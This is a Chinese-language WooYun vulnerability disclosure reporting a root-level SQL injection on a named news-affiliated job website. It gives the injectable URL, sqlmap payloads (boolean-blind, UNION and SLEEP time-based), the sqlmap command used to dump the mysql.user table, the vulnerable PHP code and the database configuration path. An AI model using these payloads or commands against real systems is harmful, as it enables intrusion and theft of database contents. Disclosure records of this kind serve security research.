当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-049324

漏洞标题:赣南日报旗下某网站sql注入(root权限)

相关厂商:赣南日报

漏洞作者: m_vptr

提交时间:2014-01-20 11:59

修复时间:2014-03-06 12:00

公开时间:2014-03-06 12:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-03-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

sql注入,root权限,可下载php源码,并在源码中发现了数据库配置信息

详细说明:

注入点: http://www.gzjtw.com.cn/jobview.php?id=164%E2%80%98
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (8318=8318) THEN 0x313634254532253830253938 ELSE 8318*(SELECT 8318 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
Type: UNION query
Title: MySQL UNION query (random number) - 21 columns
Payload: id=-5538 UNION ALL SELECT 4192,4192,4192,4192,4192,4192,CONCAT(0x7172717471,0x73706f61517573634b63,0x71797a6371),4192,4192,4192,4192,4192,4192,4192,4192,4192,4192,4192,4192,4192,4192#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: id=-9332 OR 9584=SLEEP(5)
---
[16:20:07] [INFO] testing MySQL
[16:20:07] [INFO] confirming MySQL
[16:20:07] [INFO] the back-end DBMS is MySQL
[16:20:07] [INFO] actively fingerprinting MySQL
[16:20:07] [INFO] executing MySQL comment injection fingerprint
web server operating system: Windows
web application technology: PHP 5.2.14, Apache 2.2.16
back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
comment injection fingerprint: MySQL 5.0.90
看权限
database management system users roles:
[*] 'root'@'localhost' (administrator) [25]:
role: ALTER
role: ALTER ROUTINE
role: CREATE
role: CREATE ROUTINE
role: CREATE TEMPORARY TABLES
role: CREATE USER
role: CREATE VIEW
role: DELETE
role: DROP
role: EXECUTE
role: FILE
role: INDEX
role: INSERT
role: LOCK TABLES
role: PROCESS
role: REFERENCES
role: RELOAD
role: REPLICATION CLIENT
role: REPLICATION SLAVE
role: SELECT
role: SHOW DATABASES
role: SHOW VIEW
role: SHUTDOWN
role: SUPER
role: UPDATE
--os-shell不成功,但爆出了路径,把源代码下来看了看
D__phpnow_htdocs_jobview.php

<?php  
require_once("global.php");
$id=$_GET['id'];
$exes="select * from jobinfotable where jid=".$id."";
$rss=mysql_query($exes);
$rows=mysql_fetch_array($rss);
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
......


顺藤摸瓜,找到了数据库配置
D__phpnow_htdocs_kf8inc_Kf8connFile.inc.php

<?php 
$mysql_server_name='localhost';
$mysql_username='root';
$mysql_password=xxx;
$mysql_database='gzjtw';
...

漏洞证明:

available databases [9]:
[*] gouwu
[*] gzjtw
[*] hunqin
[*] information_schema
[*] mysql
[*] test
[*] tianxia
[*] xinyu
[*] zx
Database: mysql
[17 tables]
+---------------------------+
| user |
| columns_priv |
| db |
| func |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| proc |
| procs_priv |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------+
其它库,其它表就不贴了
sqlmap.py -u "http://www.gzjtw.com.cn/jobview.php?id=164%E2%80%98" -D mysql --sql-query "SELECT * from mysql.user limit 1"
[08:40:59] [INFO] fetching SQL SELECT statement query output: 'SELECT * from mysql.user limit 1'
[08:40:59] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[08:40:59] [INFO] fetching columns for table 'user' in database 'mysql'
[08:40:59] [INFO] the SQL query used returns 37 entries
[08:40:59] [INFO] the query with expanded column name(s) is: SELECT Alter_priv, Alter_routine_priv, Create_priv, Create_routine_priv, Create_tmp_table_priv, Create_user_priv, Create_view_priv, Delete_priv, Drop_priv, Execute_priv, File_priv, Grant_priv, Host, Index_priv, Insert_priv, Lock_tables_priv, Password, Process_priv, References_priv, Reload_priv, Repl_client_priv, Repl_slave_priv, Select_priv, Show_db_priv, Show_view_priv, Shutdown_priv, Super_priv, Update_priv, `User`, max_connections, max_questions, max_updates, max_user_connections, ssl_cipher, ssl_type, x509_issuer, x509_subject FROM mysql.user LIMIT 1
SELECT * from mysql.user limit 1 [1]:
[*] Y, Y, Y, Y, Y, Y, Y, Y, Y, Y, Y, Y, localhost, Y, Y, Y, xxxxx, Y, Y, Y, Y, Y, Y, Y, Y, Y, Y, Y, root, 0, 0, 0, 0, , , ,

修复方案:

过滤

版权声明:转载请注明来源 m_vptr@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝